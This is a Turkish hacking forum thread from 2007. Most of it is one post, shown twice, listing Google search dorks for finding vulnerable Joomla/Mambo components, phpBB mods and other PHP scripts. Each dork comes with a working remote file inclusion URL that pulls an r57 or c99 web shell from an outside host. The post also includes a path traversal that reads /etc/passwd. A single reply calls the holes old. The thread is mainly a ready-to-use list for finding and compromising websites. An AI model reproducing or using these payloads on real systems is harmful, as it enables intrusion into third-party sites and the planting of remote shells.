rfi açıkları

Cainei · 09-18-2007, 07:15

Google Araması:
inurl:"com_flyspray"

exploit:
/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00

exploit:
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1
&GLOBALS=&mosConfig_absolute_path=http://site/sh3L/r57.jpg?cmd=id
Google Araması:
inurl:index.php?option=com_simpleboard

exploit:
/components/com_simpleboard/file_upload.php?sbp=http:///sh3L/r57.jpg?
Google Araması:
inurl:"com_hashcash"

exploit:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_htmlarea3_xtd-c"

exploit:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_sitemap"

exploit:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_performs"

exploit:
/components/com_forum/download.php?phpbb_root_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_pccookbook"

exploit:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:index.php?option=com_extcalendar

exploit:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"minibb"

exploit:
components/minibb/index.php?absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_smf"

exploit:
/components/com_smf/smf.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
exploit:
/modules/mod_calendar.php?absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_pollxt"

exploit:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_loudmounth"

exploit:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_videodb"

exploit:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://site/sh3L/r57.jpg?
Google Araması:
inurl:index.php?option=com_pcchess

exploit:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_multibanners"

exploit:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_a6mambohelpdesk"

exploit:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_colophon"

exploit:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_mgm"

exploit:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_mambatstaff"

exploit:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_securityimages"

exploit:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
exploit:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_artlinks"

exploit:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg?
Google Araması:
inurl:"com_galleria"

exploit:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://site/lang/r57.jpg?

Google Araması:

inurl:index.php?option=com_simpleboard

/components/com_simpleboard/file_upload.php?sbp=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:

inurl:"com_hashcash"

KOD:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_forum"

/components/com_forum/download.php?phpbb_root_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:index.php?option=com_extcalendar

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"minibb"

components/minibb/index.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_pollxt"

/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_loudmounth"

/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_videodb"

/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:index.php?option=com_pcchess

/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_multibanners"

/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hitbaytar.kayyo.com/c99shell.txt?

Google Araması:
inurl:"com_a6mambohelpdesk"

/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hitbaytar.kayyo.com/c99shell.txt?

google araması: "activity.php?page=hof" veya "Powered by phpBB" inurl:activity.php şeklinde arabilirsiniz...

kullanımı :http://hedef/script/language/lang_en...t.com/c99.txt?

Powered by phpMyAgenda

Kod:

agenda.php3?rootagenda=Shell

agenda2.php3?rootagenda=Shell

inurl:agenda.php3

Alıntı:
agenda.php3?rootagenda=Shell

arama kodu:Xero Portal v1.2

[Exploit:
www.[target].com/[script_pat]/admin/admin_linkdb.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_forum_prune.php?phpbb_root_path=http://evilscripts?# www.[target].com/[script_pat]/admin/admin_extensions.php?phpbb_root_path=http://evilscripts?
Kaynak: Wardom http://www.wardom.org/showthread.php?t=162543
www.[target].com/[script_pat]/admin/admin_board.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_attachments.php?phpbb_root_path=http://evilscripts?
www.[target].com/[script_pat]/admin/admin_users.php?phpbb_root_path=http://evilscripts?

inurl:"fclick.php?fid"

show.php?path=http://muhacir.up.md/c99.txt?

show.php?path=http://muhacir.up.md/r57shell.txt?

SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
Kaynak: Wardom http://www.wardom.org/showthread.php?t=162543

http://[target]/[path]/sipss...s]=[SHELL]

Example:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

m0liver · 09-18-2007, 11:08

eski açıklar..

09-18-2007, 07:15	#1
Cainei Forum Kalfası Kayıt Tarihi: Jul 2006 Üye numarası: #77049 Mesaj sayısı: 2,466 Karma etkisi: 911 Karma: 90458	rfi açıkları Google Araması: inurl:"com_flyspray" exploit: /components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00 exploit: /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1 &GLOBALS=&mosConfig_absolute_path=http://site/sh3L/r57.jpg?cmd=id Google Araması: inurl:index.php?option=com_simpleboard exploit: /components/com_simpleboard/file_upload.php?sbp=http:///sh3L/r57.jpg? Google Araması: inurl:"com_hashcash" exploit: /components/com_hashcash/server.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_htmlarea3_xtd-c" exploit: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_sitemap" exploit: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_performs" exploit: /components/com_forum/download.php?phpbb_root_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_pccookbook" exploit: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:index.php?option=com_extcalendar exploit: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"minibb" exploit: components/minibb/index.php?absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_smf" exploit: /components/com_smf/smf.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? exploit: /modules/mod_calendar.php?absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_pollxt" exploit: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_loudmounth" exploit: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_videodb" exploit: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://site/sh3L/r57.jpg? Google Araması: inurl:index.php?option=com_pcchess exploit: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_multibanners" exploit: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://site/sh3L/r57.jpg? Google Araması: inurl:"com_a6mambohelpdesk" exploit: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://site/sh3L/r57.jpg? Google Araması: inurl:"com_colophon" exploit: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_mgm" exploit: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_mambatstaff" exploit: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_securityimages" exploit: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? exploit: /components/com_securityimages/lang.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_artlinks" exploit: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://site/sh3L/r57.jpg? Google Araması: inurl:"com_galleria" exploit: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://site/lang/r57.jpg? Google Araması: inurl:index.php?option=com_simpleboard /components/com_simpleboard/file_upload.php?sbp=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_hashcash" KOD: /components/com_hashcash/server.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_sitemap" /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_forum" /components/com_forum/download.php?phpbb_root_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:index.php?option=com_extcalendar /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"minibb" components/minibb/index.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_pollxt" /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_loudmounth" /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_videodb" /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:index.php?option=com_pcchess /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_multibanners" /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hitbaytar.kayyo.com/c99shell.txt? Google Araması: inurl:"com_a6mambohelpdesk" /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hitbaytar.kayyo.com/c99shell.txt? google araması: "activity.php?page=hof" veya "Powered by phpBB" inurl:activity.php şeklinde arabilirsiniz... kullanımı :http://hedef/script/language/lang_en...t.com/c99.txt? Powered by phpMyAgenda Kod: agenda.php3?rootagenda=Shell agenda2.php3?rootagenda=Shell inurl:agenda.php3 Alıntı: agenda.php3?rootagenda=Shell arama kodu:Xero Portal v1.2 [Exploit: www.[target].com/[script_pat]/admin/admin_linkdb.php?phpbb_root_path=http://evilscripts? www.[target].com/[script_pat]/admin/admin_forum_prune.php?phpbb_root_path=http://evilscripts?# www.[target].com/[script_pat]/admin/admin_extensions.php?phpbb_root_path=http://evilscripts? Kaynak: Wardom http://www.wardom.org/showthread.php?t=162543 www.[target].com/[script_pat]/admin/admin_board.php?phpbb_root_path=http://evilscripts? www.[target].com/[script_pat]/admin/admin_attachments.php?phpbb_root_path=http://evilscripts? www.[target].com/[script_pat]/admin/admin_users.php?phpbb_root_path=http://evilscripts? inurl:"fclick.php?fid" show.php?path=http://muhacir.up.md/c99.txt? show.php?path=http://muhacir.up.md/r57shell.txt? SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability Kaynak: Wardom http://www.wardom.org/showthread.php?t=162543 http://[target]/[path]/sipss...s]=[SHELL] Example: /sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

09-18-2007, 11:08	#2
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 3,024 Karma etkisi: 6263 Karma: 625645	eski açıklar.. __________________ 83800f559bcbaf5d5dc1f010621b9575

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama
Konuya Oy Ver
Konuya Oy Ver: